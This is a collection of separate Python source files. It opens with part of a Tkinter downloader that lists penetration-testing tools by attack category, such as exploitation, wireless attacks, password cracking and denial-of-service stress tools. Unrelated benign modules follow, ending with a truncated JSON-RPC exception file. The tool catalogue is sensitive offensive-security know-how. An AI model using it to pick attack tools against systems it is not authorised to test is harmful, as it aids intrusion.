varpass = StringVar(root, value="Password Attacks")
varhard = StringVar(root, value="Hardware Hacking")
varreverse = StringVar(root, value="Reverse Engineering")
varreport = StringVar(root, value="Reporting tools")
varall = StringVar(root, value="All tools")
infolist = 'acccheck','ace-voip','Amap','Automater','bing-ip2hosts','braa','CaseFile','CDPSnarf','cisco-torch','Cookie Cadger','copy-router-config','DMitry','dnmap','dnsenum','dnsmap','DNSRecon','dnstracer','dnswalk','DotDotPwn','enum4linux','enumIAX','Fierce','Firewalk','fragroute','fragrouter','Ghost Phisher','GoLismero','goofile','hping3','InTrace','iSMTP','lbd','Maltego Teeth','masscan','Metagoofil','Miranda','nbtscan-unixwiz','Nmap','ntop','p0f','Parsero','Recon-ng','SET','smtp-user-enum','snmp-check','sslcaudit','SSLsplit','sslstrip','SSLyze','THC-IPV6','theHarvester','TLSSLed','twofi','URLCrazy','Wireshark','WOL-E','Xplico'
vulnlist = 'BBQSQL','BED','BruteXSS','cisco-auditing-tool','cisco-global-exploiter','cisco-ocs','cisco-torch','copy-router-config','DBPwAudit','Doona','DotDotPwn','Greenbone Security Assistant','GSD','HexorBase','Inguma','jSQL','Lynis','Nmap','ohrwurm','openvas-administrator','openvas-cli','openvas-manager','openvas-scanner','Oscanner','Powerfuzzer','sfuzz','SidGuesser','SIPArmyKnife','sqlmap','Sqlninja','sqlsus','THC-IPV6','tnscmd10g','unix-privesc-check','Yersinia'
exploitlist = 'Armitage','Backdoor Factory','BeEF','cisco-auditing-tool','cisco-global-exploiter','cisco-ocs','cisco-torch','Commix','crackle','exploitdb','jboss-autopwn','Linux Exploit Suggester','Maltego Teeth','SET','ShellNoob','sqlmap','struts pwn','THC-IPV6','Yersinia'
wirelesslist = 'Aircrack-ng','Asleap','Bluelog','BlueMaho','Bluepot','BlueRanger','Bluesnarfer','Bully','coWPAtty','crackle','eapmd5pass','Fern Wifi Cracker','Ghost Phisher','GISKismet','Gqrx','gr-scan','hostapd-wpe','kalibrate-rtl','KillerBee','mdk3','mfcuk','mfoc','mfterm','Multimon-NG','PixieWPS','Reaver','redfang','RTLSDR Scanner','Spooftooph','Wifi Honey','wifiphisher','Wifitap','Wifite'
forensiclist = 'Binwalk','bulk-extractor','Capstone','chntpw','Cuckoo','dc3dd','ddrescue','DFF','diStorm3','Dumpzilla','extundelete','Foremost','Galleta','Guymager','iPhone Backup Analyzer','p0f','pdf-parser','pdfid','pdgmail','peepdf','RegRipper','Volatility','Xplico'
webapplist = 'apache-users','Arachni','BBQSQL','BlindElephant','Burp Suite','CutyCapt','DAVTest','deblaze','DIRB','DirBuster','fimap','FunkLoad','Gobuster','Grabber','jboss-autopwn','joomscan','jSQL','Maltego Teeth','PadBuster','Paros','Parsero','plecost','Powerfuzzer','ProxyStrike','Recon-ng','Skipfish','sqlmap','Sqlninja','sqlsus','ua-tester','Uniscan','Vega','w3af','WebScarab','Webshag','WebSlayer','WebSploit','Wfuzz','WPScan','XSSer','zaproxy'
stresslist = 'DHCPig','FunkLoad','iaxflood','Inundator','inviteflood','ipv6-toolkit','mdk3','Reaver','rtpflood','SlowHTTPTest','t50','Termineter','THC-IPV6','THC-SSL-DOS'
snifflist = 'Burp Suite','DNSChef','fiked','hamster-sidejack','HexInject','iaxflood','inviteflood','iSMTP','isr-evilgrade','mitmproxy','ohrwurm','protos-sip','rebind','responder','rtpbreak','rtpinsertsound','rtpmixsound','sctpscan','SIPArmyKnife','SIPp','SIPVicious','SniffJoke','SSLsplit','sslstrip','THC-IPV6','VoIPHopper','WebScarab','Wifi Honey','Wireshark','xspy','Yersinia','zaproxy'
passlist = 'acccheck','Burp Suite','CeWL','chntpw','cisco-auditing-tool','CmosPwd','creddump','crunch','DBPwAudit','findmyhash','gpp-decrypt','hash-identifier','HexorBase','THC-Hydra','John the Ripper','Johnny','keimpx','Maltego Teeth','Maskprocessor','multiforcer','Ncrack','oclgausscrack','PACK','patator','phrasendrescher','polenum','RainbowCrack','rcracki-mt','RSMangler','SQLdict','Statsprocessor','THC-pptp-bruter','TrueCrack','WebScarab','wordlists','zaproxy'
hardlist = 'android-sdk','apktool','Arduino','dex2jar','Sakis3G','smali'
reverselist = 'apktool','dex2jar','diStorm3','edb-debugger','jad','javasnoop','JD-GUI','OllyDbg','smali','Valgrind','YARA'
reportlist = 'CaseFile','CutyCapt','dos2unix','Dradis','KeepNote','MagicTree','Metagoofil','Nipper-ng','pipal'
alllist = 'BruteXSS','dos2unix','Dradis','KeepNote','MagicTree','Metagoofil','Nipper-ng','pipal','diStorm3','edb-debugger','jad','javasnoop','JD-GUI','OllyDbg','Valgrind','YARA','acccheck','ace-voip','Amap','Automater','bing-ip2hosts','braa','CaseFile','CDPSnarf','Cookie Cadger','copy-router-config','DMitry','dnmap','dnsenum','dnsmap','DNSRecon','dnstracer','dnswalk','enum4linux','enumIAX','Fierce','Firewalk','fragroute','fragrouter','GoLismero','goofile','hping3','InTrace','lbd','masscan','Miranda','nbtscan-unixwiz','ntop','smtp-user-enum','snmp-check','sslcaudit','struts pwn','SSLyze','theHarvester','TLSSLed','twofi','URLCrazy','WOL-E','BED','cisco-global-exploiter','cisco-ocs','Doona','DotDotPwn','Greenbone Security Assistant','GSD','Inguma','Lynis','Nmap','openvas-administrator','openvas-cli','openvas-manager','openvas-scanner','Oscanner','sfuzz','SidGuesser','Sqlninja','sqlsus','tnscmd10g','unix-privesc-check','Yersinia','Armitage','Backdoor Factory','BeEF','cisco-auditing-tool','cisco-torch','Commix','crackle','exploitdb','Linux Exploit Suggester','SET','ShellNoob','Aircrack-ng','Asleap','Bluelog','BlueMaho','Bluepot','BlueRanger','Bluesnarfer','Bully','coWPAtty','eapmd5pass','Fern Wifi Cracker','Ghost Phisher','GISKismet','Gqrx','gr-scan','hostapd-wpe','kalibrate-rtl','KillerBee','mdk3','mfcuk','mfoc','mfterm','Multimon-NG','PixieWPS','redfang','RTLSDR Scanner','Spooftooph','wifiphisher','Wifitap','Wifite','Binwalk','bulk-extractor','Capstone','Cuckoo','dc3dd','ddrescue','DFF','Dumpzilla','extundelete','Foremost','Galleta','Guymager','iPhone Backup Analyzer','p0f','pdf-parser','pdfid','pdgmail','peepdf','RegRipper','Volatility','Xplico','apache-users','Arachni','BBQSQL','BlindElephant','Burp Suite','CutyCapt','DAVTest','deblaze','DIRB','DirBuster','fimap','Gobuster','Grabber','jboss-autopwn','joomscan','jSQL','PadBuster','Paros','Parsero','plecost','Powerfuzzer','ProxyStrike','Recon-ng','Skipfish','sqlmap','ua-tester','Uniscan','Vega','w3af','Webshag','WebSlayer','WebSploit','Wfuzz','WPScan','XSSer','DHCPig','FunkLoad','iaxflood','Inundator','inviteflood','ipv6-toolkit','Reaver','rtpflood','SlowHTTPTest','t50','Termineter','THC-SSL-DOS','DNSChef','fiked','hamster-sidejack','HexInject','iSMTP','isr-evilgrade','mitmproxy','ohrwurm','protos-sip','rebind','responder','rtpbreak','rtpinsertsound','rtpmixsound','sctpscan','SIPArmyKnife','SIPp','SIPVicious','SniffJoke','SSLsplit','sslstrip','THC-IPV6','VoIPHopper','Wifi Honey','Wireshark','xspy','CeWL','chntpw','CmosPwd','creddump','crunch','DBPwAudit','findmyhash','gpp-decrypt','hash-identifier','HexorBase','THC-Hydra','John the Ripper','Johnny','keimpx','Maltego Teeth','Maskprocessor','multiforcer','Ncrack','oclgausscrack','PACK','patator','phrasendrescher','polenum','RainbowCrack','rcracki-mt','RSMangler','SQLdict','Statsprocessor','THC-pptp-bruter','TrueCrack','WebScarab','wordlists','zaproxy','android-sdk','apktool','Arduino','dex2jar','Sakis3G','smali'
alltools = 'brutexss','dos2unix','dradis','keepnote','magictree','metagoofil','nipper-ng','pipal','distorm3','edb-debugger','jad','javasnoop','jd-gui','ollydbg','valgrind','yara','acccheck','ace-voip','amap','automater','bing-ip2hosts','braa','casefile','cdpsnarf','cookie cadger','copy-router-config','dmitry','dnmap','dnsenum','dnsmap','dnsrecon','dnstracer','dnswalk','enum4linux','enumiax','fierce','firewalk','fragroute','fragrouter','golismero','goofile','hping3','intrace','lbd','masscan','miranda','nbtscan-unixwiz','ntop','smtp-user-enum','snmp-check','sslcaudit','struts pwn','sslyze','theharvester','tlssled','twofi','urlcrazy','wol-e','bed','cisco-global-exploiter','cisco-ocs','doona','dotdotpwn','greenbone security assistant','gsd','inguma','lynis','nmap','openvas-administrator','openvas-cli','openvas-manager','openvas-scanner','oscanner','sfuzz','sidguesser','sqlninja','sqlsus','tnscmd10g','unix-privesc-check','yersinia','armitage','backdoor factory','beef','cisco-auditing-tool','cisco-torch','commix','crackle','exploitdb','linux exploit suggester','set','shellnoob','aircrack-ng','asleap','bluelog','bluemaho','bluepot','blueranger','bluesnarfer','bully','cowpatty','eapmd5pass','fern wifi cracker','ghost phisher','giskismet','gqrx','gr-scan','hostapd-wpe','kalibrate-rtl','killerbee','mdk3','mfcuk','mfoc','mfterm','multimon-ng','pixiewps','redfang','rtlsdr scanner','spooftooph','wifiphisher','wifitap','wifite','binwalk','bulk-extractor','capstone','cuckoo','dc3dd','ddrescue','dff','dumpzilla','extundelete','foremost','galleta','guymager','iphone backup analyzer','p0f','pdf-parser','pdfid','pdgmail','peepdf','regripper','volatility','xplico','apache-users','arachni','bbqsql','blindelephant','burp suite','cutycapt','davtest','deblaze','dirb','dirbuster','fimap','gobuster','grabber','jboss-autopwn','joomscan','jsql','padbuster','paros','parsero','plecost','powerfuzzer','proxystrike','recon-ng','skipfish','sqlmap','ua-tester','uniscan','vega','w3af','webshag','webslayer','websploit','wfuzz','wpscan','xsser','dhcpig','funkload','iaxflood','inundator','inviteflood','ipv6-toolkit','reaver','rtpflood','slowhttptest','t50','termineter','thc-ssl-dos','dnschef','fiked','hamster-sidejack','hexinject','ismtp','isr-evilgrade','mitmproxy','ohrwurm','protos-sip','rebind','responder','rtpbreak','rtpinsertsound','rtpmixsound','sctpscan','siparmyknife','sipp','sipvicious','sniffjoke','sslsplit','sslstrip','thc-ipv6','voiphopper','wifi honey','wireshark','xspy','cewl','chntpw','cmospwd','creddump','crunch','dbpwaudit','findmyhash','gpp-decrypt','hash-identifier','hexorbase','thc-hydra','john the ripper','johnny','keimpx','maltego teeth','maskprocessor','multiforcer','ncrack','oclgausscrack','pack','patator','phrasendrescher','polenum','rainbowcrack','rcracki-mt','rsmangler','sqldict','statsprocessor','thc-pptp-bruter','truecrack','webscarab','wordlists','zaproxy','android-sdk','apktool','arduino','dex2jar','sakis3g','smali'
def downloadsection():
    def cbinfo_onEnter(event):
        #It will get the values
        cbinfovalue = format(cbinfo.get())
        cbvulnvalue = format(cbvuln.get())
        cbexploitvalue = format(cbexploit.get())
        cbwirelessvalue = format(cbwireless.get())
        cbforensicsvalue = format(cbforensics.get())
        cbwebvalue = format(cbweb.get())
        cbstressvalue = format(cbstress.get())
        cbsniffvalue = format(cbsniff.get())
        cbpassvalue = format(cbpass.get())
        cbhardvalue = format(cbhard.get())
        cbreversevalue = format(cbreverse.get())
        cbreportvalue = format(cbreport.get())
        cballvalue = format(cball.get())
        #One value per combobox, each included exactly once
        result = cbinfovalue+"\n"+cbvulnvalue+"\n"+cbexploitvalue+"\n"+cbwirelessvalue+"\n"+cbforensicsvalue+"\n"+cbwebvalue+"\n"+cbstressvalue+"\n"+cbsniffvalue+"\n"+cbpassvalue+"\n"+cbhardvalue+"\n"+cbreversevalue+"\n"+cbreportvalue+"\n"+cballvalue
        #print result
        checktool(result)
        startdownload()
    _bgcolor = '#d9d9d9' # X11 color: 'gray85'
    _fgcolor = '#000000' # X11 color: 'black'
    _compcolor = '#d9d9d9' # X11 color: 'gray85'
    _ana1color = '#d9d9d9' # X11 color: 'gray85'
    _ana2color = '#d9d9d9' # X11 color: 'gray85'
    style = ttk.Style()
    if sys.platform == "win32":
        style.theme_use('winnative')
    style.configure('.', background=_bgcolor)
    style.configure('.', foreground=_fgcolor)
    style.configure('.', font="TkDefaultFont")
    style.map('.', background=
        [('selected', _compcolor), ('active', _ana2color)])
    #Information Gathering Drop Down
    cbinfo = ttk.Combobox(width=70, textvariable=varinfo)
    cbinfo.bind("<Return>", cbinfo_onEnter)
    cbinfo.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbinfo['values'] = (infolist)
    cbinfo.place(relx=0.115, rely=0.18)
    #Vulnerability Analysis Drop Down
    cbvuln = ttk.Combobox(width=70, textvariable=varvuln)
    cbvuln.bind("<Return>", cbinfo_onEnter)
    cbvuln.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbvuln['values'] = (vulnlist)
    cbvuln.place(relx=0.115, rely=0.24)
    #Exploitation Tool Drop Down
    cbexploit = ttk.Combobox(width=70, textvariable=varexploit)
    cbexploit.bind("<Return>", cbinfo_onEnter)
    cbexploit.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbexploit['values'] = (exploitlist)
    cbexploit.place(relx=0.115, rely=0.30)
    #Wireless Attacks Drop Down
    cbwireless = ttk.Combobox(width=70, textvariable=varwireless)
    cbwireless.bind("<Return>", cbinfo_onEnter)
    cbwireless.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbwireless['values'] = (wirelesslist)
    cbwireless.place(relx=0.115, rely=0.36)
    #Forensics tools Drop Down
    cbforensics = ttk.Combobox(width=70, textvariable=varforensic)
    cbforensics.bind("<Return>", cbinfo_onEnter)
    cbforensics.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbforensics['values'] = (forensiclist)
    cbforensics.place(relx=0.115, rely=0.42)
    #Web Application Drop Down
    cbweb = ttk.Combobox(width=70, textvariable=varwebapp)
    cbweb.bind("<Return>", cbinfo_onEnter)
    cbweb.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbweb['values'] = (webapplist)
    cbweb.place(relx=0.115, rely=0.48)
    #Stress Testing Drop Down
    cbstress = ttk.Combobox(width=70, textvariable=varstress)
    cbstress.bind("<Return>", cbinfo_onEnter)
    cbstress.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbstress['values'] = (stresslist)
    cbstress.place(relx=0.115, rely=0.54)
    #Sniffing & Spoofing Drop Down
    cbsniff = ttk.Combobox(width=70, textvariable=varsniff)
    cbsniff.bind("<Return>", cbinfo_onEnter)
    cbsniff.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbsniff['values'] = (snifflist)
    cbsniff.place(relx=0.115, rely=0.60)
    #Password Drop Down
    cbpass = ttk.Combobox(width=70, textvariable=varpass)
    cbpass.bind("<Return>", cbinfo_onEnter)
    cbpass.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbpass['values'] = (passlist)
    cbpass.place(relx=0.115, rely=0.66)
    #Hardware Hacking Drop Down
    cbhard = ttk.Combobox(width=70, textvariable=varhard)
    cbhard.bind("<Return>", cbinfo_onEnter)
    cbhard.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbhard['values'] = (hardlist)
    cbhard.place(relx=0.115, rely=0.72)
    #Reverse Engineering Drop Down
    cbreverse = ttk.Combobox(width=70, textvariable=varreverse)
    cbreverse.bind("<Return>", cbinfo_onEnter)
    cbreverse.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbreverse['values'] = (reverselist)
    cbreverse.place(relx=0.115, rely=0.78)
    #Reporting tools Drop Down
    cbreport = ttk.Combobox(width=70, textvariable=varreport)
    cbreport.bind("<Return>", cbinfo_onEnter)
    cbreport.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cbreport['values'] = (reportlist)
    cbreport.place(relx=0.115, rely=0.84)
    #All tools Drop Down
    cball = ttk.Combobox(width=70, textvariable=varall)
    cball.bind("<Return>", cbinfo_onEnter)
    cball.bind("<<ComboboxSelected>>", cbinfo_onEnter)
    cball['values'] = (alllist)
    cball.place(relx=0.115, rely=0.90)
#A testing command
def test(text):
    print 'In development phase.' + text

def mydownloadf():
    mydownloads()

def reportf():
    report()

def search():
    search = Tk()
    search.geometry("336x93+518+273")
    search.title("Search")
    search.configure(background="#d9d9d9")
    search.wm_iconbitmap('images/icon.ico')
    search.resizable(0, 0)
    SearchEntry = ttk.Entry(search)
    SearchEntry.place(relx=0.12, rely=0.32, relheight=0.23, relwidth=0.55)
    SearchEntry.configure(width=186)
    SearchEntry.configure(takefocus="")
    SearchEntry.configure(cursor="ibeam")
    def tobesearch():
        searchingtext = SearchEntry.get()
        search.destroy()
        def ok():
            searching.destroy()
            savedownloads(searchingtext)
            startdownload()
        def cancel():
            searching.destroy()
        def yes():
            searching.destroy()
            suggestions()
        #print searchingtext
        if searchingtext.lower() in alltools:
            searching = Tk()
            searching.geometry("322x155+456+155")
            searching.title("Search")
            searching.configure(background="#d9d9d9")
            #searching.wm_iconbitmap('images/icon.ico')
            searching.resizable(0, 0)
            Searching = ttk.Label(searching)
            Searching.place(relx=0.33, rely=0.13, height=29, width=186)
            Searching.configure(background="#d9d9d9")
            Searching.configure(foreground="#000000")
            Searching.configure(relief=FLAT)
            Searching.configure(text='''Awesome! We found''')
            Searching.configure(width=186)
            Searching2 = ttk.Label(searching)
            Searching2.place(relx=0.4, rely=0.32, height=19, width=186)
            Searching2.configure(background="#d9d9d9")
            Searching2.configure(foreground="#000000")
            Searching2.configure(relief=FLAT)
            Searching2.configure(text=searchingtext)
            SearchingButtono = ttk.Button(searching, command=ok)
            SearchingButtono.place(relx=0.12, rely=0.65, height=25, width=76)
            SearchingButtono.configure(takefocus="")
            SearchingButtono.configure(text='''Continue''')
            SearchingButtonn = ttk.Button(searching, command=cancel)
            SearchingButtonn.place(relx=0.59, rely=0.65, height=25, width=76)
            SearchingButtonn.configure(takefocus="")
            SearchingButtonn.configure(text='''Cancel''')
        else:
            searching = Tk()
            searching.geometry("322x155+456+155")
            searching.title("Oops! Can't find any tool")
            searching.configure(background="#d9d9d9")
            searching.wm_iconbitmap('images/icon.ico')
            searching.resizable(0, 0)
            Searching = ttk.Label(searching)
            Searching.place(relx=0.20, rely=0.13, height=29, width=186)
            Searching.configure(background="#d9d9d9")
            Searching.configure(foreground="#000000")
            Searching.configure(relief=FLAT)
            Searching.configure(text='''Wanna send us a suggestion about''')
            Searching.configure(width=186)
            Searching2 = ttk.Label(searching)
            Searching2.place(relx=0.4, rely=0.32, height=19, width=186)
            Searching2.configure(background="#d9d9d9")
            Searching2.configure(foreground="#000000")
            Searching2.configure(relief=FLAT)
            Searching2.configure(text=searchingtext)
            SearchingButtono = ttk.Button(searching, command=yes)
            SearchingButtono.place(relx=0.12, rely=0.65, height=25, width=76)
            SearchingButtono.configure(takefocus="")
            SearchingButtono.configure(text='''Yes''')
            SearchingButtonn = ttk.Button(searching, command=cancel)
            SearchingButtonn.place(relx=0.59, rely=0.65, height=25, width=76)
            SearchingButtonn.configure(takefocus="")
            SearchingButtonn.configure(text='''No''')
    SearchButton = ttk.Button(search, command=tobesearch)
    SearchButton.place(relx=0.71, rely=0.32, height=25, width=76)
    SearchButton.configure(takefocus="")
    SearchButton.configure(text='''Search''')
#Here is the top menubar
menubar = Menu(root)
homemenu = Menu(menubar, tearoff=0)
homemenu.add_command(label="Download Section", command=downloadsection)
homemenu.add_command(label="My Downloads", command=mydownloadf)
homemenu.add_separator()
homemenu.add_command(label="About me", command=aboutme)
homemenu.add_separator()
homemenu.add_command(label="Contact", command=contact)
menubar.add_cascade(label = "Home", menu=homemenu)
aboutmenu = Menu(menubar, tearoff=0)
aboutmenu.add_command(label="About this Tool", command=about)
aboutmenu.add_command(label="Licenses", command=licenses)
aboutmenu.add_separator()
aboutmenu.add_command(label="Check for Updates", command=checkupdates)
aboutmenu.add_separator()
aboutmenu.add_command(label="Contributors", command=contributions)
aboutmenu.add_command(label="Send me suggestions", command=suggestions)
aboutmenu.add_command(label="Report a tool", command=reportf)
menubar.add_cascade(label="About", menu=aboutmenu)
menubar.add_command(label="Search",command=search)
menubar.add_command(label = "Quit", command = sys.exit)
root.config(menu=menubar)
#Here menu bar ends.
#Here the program starts
downloadsection()
root.mainloop()
atexit.register(atgexit)

if __name__ == '__main__':
    mainbody()
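The `tobesearch` handler above routes to either the "found" dialog or the suggestion dialog with a plain case-insensitive membership test against the `alltools` tuple. A minimal standalone sketch of that decision (the trimmed `ALLTOOLS` tuple and the `lookup` helper are hypothetical names for illustration; the real code opens Tk windows instead of returning strings):

```python
# Hypothetical, trimmed stand-in for the alltools tuple used by the search box.
ALLTOOLS = ('nmap', 'sqlmap', 'john the ripper', 'aircrack-ng')

def lookup(query):
    """Mimic tobesearch(): case-insensitive exact-match membership decides the dialog."""
    if query.lower() in ALLTOOLS:
        return 'found'    # would open the "Awesome! We found" window
    return 'suggest'      # would offer to send a suggestion instead

print(lookup('NMAP'))      # any casing of an exact tool name -> 'found'
print(lookup('nmap -sV'))  # whole-string match only, so extra text -> 'suggest'
```

Note that this is an exact-string match, which is why the original list must be stored fully lowercased: any mixed-case entry in `alltools` can never be matched by `query.lower()`.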
# ---- pyrosim/_network.py (repo jbongard/SAIL_ON, MIT license) ----
class Mixin(object):
    def _send_neuron(self, *args):
        return self._send_entity('Neuron', *args)

    def _send_synapse(self, *args):
        return self._send_entity('Synapse', *args)

    def send_synapse(self, source_neuron_id, target_neuron_id, weight):
        """Send a synapse to the simulator to connect neurons

        Parameters
        ----------
        source_neuron_id : int
            The id tag of the source neuron
        target_neuron_id : int
            The id tag of the target neuron
        weight : float
            The weight value of the synapse

        Returns
        -------
        int
            The id tag of the synapse
        """
        self._assert_neuron(source_neuron_id, 'source_neuron_id')
        self._assert_neuron(target_neuron_id, 'target_neuron_id')
        return self._send_synapse('Synapse',
                                  source_neuron_id,
                                  target_neuron_id,
                                  weight)

    def send_bias_neuron(self, value=1.0):
        """Send a bias neuron to the simulator"""
        return self._send_neuron('BiasNeuron', value)

    def send_sensor_neuron(self, sensor_id):
        """Send a sensor neuron to the simulator

        Parameters
        ----------
        sensor_id : int
            The id tag of the sensor to pull values from at each time step.

        Returns
        -------
        int
            The id tag of the neuron
        """
        self._assert_sensor(sensor_id, 'sensor_id')
        return self._send_neuron('SensorNeuron', sensor_id)

    def send_motor_neuron(self, motor_id, alpha=0.0, tau=1.0, starting_value=0.0):
        """Send a motor neuron to the simulator

        The value of the motor neuron at each time step is passed to the specified
        motor in order to determine how it should actuate.

        Parameters
        ----------
        motor_id : float
            The id tag of the motor to send neuron value to
        alpha : float (optional)
            A 'learning rate' parameter. (default is 0)
        tau : float (optional)
            A 'learning rate' parameter. (default is 1.0)
        starting_value : float (optional)
            The starting value the neuron takes. Can be useful when the motor does
            not start at 0. (default is 0)

        Returns
        -------
        int
            The id tag of the neuron
        """
        self._assert_actuator(motor_id, 'motor_id')
        return self._send_neuron('MotorNeuron', motor_id, alpha, tau, starting_value)

    def send_user_neuron(self, input_values):
        """Send a user input neuron to the simulator.

        A user input neuron takes pre-specified input supplied by the user before
        simulation. Similar to a bias neuron that changes every time step. This is
        useful to send Central Pattern Generators and other functions.

        Parameters
        ----------
        input_values : list
            The values which the neuron will take every time step. If evaluation
            time is longer than the length of the list, the values will be repeated

        Returns
        -------
        int
            The id tag of the neuron.
        """
        return self._send_neuron('UserNeuron', len(input_values), input_values)

    def send_hidden_neuron(self, alpha=1.0, tau=1.0, starting_value=0.0):
        """Send a hidden neuron to the simulator"""
        return self._send_neuron('HiddenNeuron', alpha, tau, starting_value)
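The `Mixin` above only validates arguments and forwards them; `_send_entity` and the `_assert_*` checks live elsewhere in pyrosim. A sketch of how the neuron/synapse calls compose, with a hypothetical `FakeSim` recording stub standing in for the real simulator (the stub's method bodies mirror the mixin's forwarding pattern, they are not pyrosim code):

```python
class FakeSim:
    """Hypothetical stand-in: records what the mixin methods would send."""
    def __init__(self):
        self.sent = []

    def _send_entity(self, kind, *args):
        self.sent.append((kind,) + args)
        return len(self.sent) - 1  # an id tag, like the real simulator returns

    # the real mixin validates id tags; the stub accepts anything
    def _assert_neuron(self, *a): pass
    def _assert_sensor(self, *a): pass

    # mirrors of Mixin.send_sensor_neuron / send_hidden_neuron / send_synapse
    def send_sensor_neuron(self, sensor_id):
        self._assert_sensor(sensor_id, 'sensor_id')
        return self._send_entity('Neuron', 'SensorNeuron', sensor_id)

    def send_hidden_neuron(self, alpha=1.0, tau=1.0, starting_value=0.0):
        return self._send_entity('Neuron', 'HiddenNeuron', alpha, tau, starting_value)

    def send_synapse(self, src, dst, weight):
        self._assert_neuron(src, 'source_neuron_id')
        self._assert_neuron(dst, 'target_neuron_id')
        return self._send_entity('Synapse', 'Synapse', src, dst, weight)

sim = FakeSim()
s = sim.send_sensor_neuron(0)        # id tag 0
h = sim.send_hidden_neuron()         # id tag 1
sim.send_synapse(s, h, weight=0.5)   # wire sensor neuron into hidden neuron
print(sim.sent[-1])                  # ('Synapse', 'Synapse', 0, 1, 0.5)
```

The design point is that every public `send_*` method reduces to one `_send_entity` call, so the backend only needs a single entry point for serializing entities to the simulator.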
# ---- src/linear3.py (repo AstraZeneca-NGS/LogMl, MIT license) ----
#!/usr/bin/env python
# Example of using 'linear 3' dataset
from logml import *
ml = LogMl()
ml()
print("Done!")
# ---- exasol_udf_mock_python/connection.py (repo LennartAtExasol/udf-mock-python, MIT license) ----
from enum import Enum
class ConnectionType(Enum):
    PASSWORD = 1


class Connection:
    def __init__(self, address: str, user: str = None, password: str = None,
                 type: ConnectionType = ConnectionType.PASSWORD):
        self.type = type
        self.password = password
        self.user = user
        self.address = address

    def __repr__(self):
        return str(self.__class__) + ": " + str(self.__dict__)
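`Connection.__repr__` above concatenates the class with the instance `__dict__`, and `type` defaults to the `ConnectionType.PASSWORD` enum member. A standalone restatement (same fields, no package import, hypothetical address value) showing that behaviour:

```python
from enum import Enum

class ConnectionType(Enum):
    PASSWORD = 1

class Connection:
    def __init__(self, address: str, user: str = None, password: str = None,
                 type: ConnectionType = ConnectionType.PASSWORD):
        self.type = type
        self.password = password
        self.user = user
        self.address = address

    def __repr__(self):
        # class name plus all four instance attributes
        return str(self.__class__) + ": " + str(self.__dict__)

conn = Connection("exa-db:8563", user="sys")  # hypothetical address
print(conn.type)   # ConnectionType.PASSWORD (the enum default)
print(repr(conn))
```

An enum default is safe to use as a keyword default because enum members are immutable singletons, unlike a mutable default such as a list.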
# ---- restart/Statement_yjcL/PrintSomething.py (repo yujiecong/yjcL, MIT license) ----
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@IDE :PyCharm
@Project :yjcL
@USER :yanyin
@File :PrintSomething.py
@Author :yujiecong
@Date :2021/8/31 15:58
'''
import pprint

from restart.Enum.Enum import StatementType, TokenType, ExpressionType
import restart.Global.Variable
from restart.ExpressionyjcL.BinaryOperation import BinaryOperation_yjcL
from restart.Statement_yjcL.Statement_yjcL import Statement_yjcL
from restart.TokenyjcL.Identifier import Identifier_yjcL
from restart.TokenyjcL.Number import Number_yjcL
from restart.TokenyjcL.String import String_yjcL
from restart.TokenyjcL.Token import Token_yjcL


class PrintSomething_yjcL(Statement_yjcL):
    def __init__(self, value):
        super(PrintSomething_yjcL, self).__init__()
        self.raw = value
        self.type_ = StatementType.PrintSomething

    def resolve(self):
        printWhat = self.raw["value"]  # the content to print
        printType = printWhat["type"]  # the type of the printed value
        self.printKey = self.raw["print_key"]
        self.printChar = self.printKey["value"]
        self.printValue = BinaryOperation_yjcL.getExpressionValue(printWhat)
        print(self)
        # self.children.append(printedClass)

    def __repr__(self):
        return "PrintSomething 屑%s >> %s" % (self.printChar, self.printValue)
# ---- students/K33402/Khoroshkeeva_Ksenia/LR3/locations/serializers.py (repo KseniaKhoroshkeeva/ITMO_ICT_WebDevelopment_2021-2022, MIT license) ----
from rest_framework import serializers
from .models import City, Country, UserChoice


class CitySerializer(serializers.ModelSerializer):
    """Serializer for cities"""

    class Meta:
        model = City
        fields = '__all__'


class CountrySerializer(serializers.ModelSerializer):
    """Serializer for countries"""

    class Meta:
        model = Country
        fields = '__all__'

    cities = CitySerializer(many=True)


class UserChoiceWriteSerializer(serializers.ModelSerializer):
    """Serializer for the chosen cities (for writing)"""

    class Meta:
        model = UserChoice
        fields = '__all__'

    user = serializers.HiddenField(default=serializers.CurrentUserDefault())


class UserChoiceReadSerializer(serializers.ModelSerializer):
    """Serializer for the chosen cities (for reading)"""

    class Meta:
        model = UserChoice
        fields = ['id', 'city']

    city = CitySerializer()
# ---- pyjsonrpc/src/jsonrpc/jsonrpcexceptions.py (repo mlunnay/nds_rpc, MIT license) ----
# Copyright (c) 2008, Michael Lunnay <mlunnay@gmail.com.au>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Custom exception heirachy for jsonrpc."""
class JSONRPCError(Exception):
    def __init__(self, code, msg, data=None):
        self.code = code
        self.message = msg
        self.data = data

    def __str__(self):
        out = "JSON-RPCError(%d:%s)" % (self.code, self.message)
        if self.data:
            out += ": %s" % str(self.data)
        return out

    def json_equivalent(self):
        """return a json encodable object that represents this Exception."""
        obj = {'code': self.code, 'message': self.message}
        if self.data is not None:
            obj['data'] = self.data
        return obj


class ParseError(JSONRPCError):
    def __init__(self, data=None):
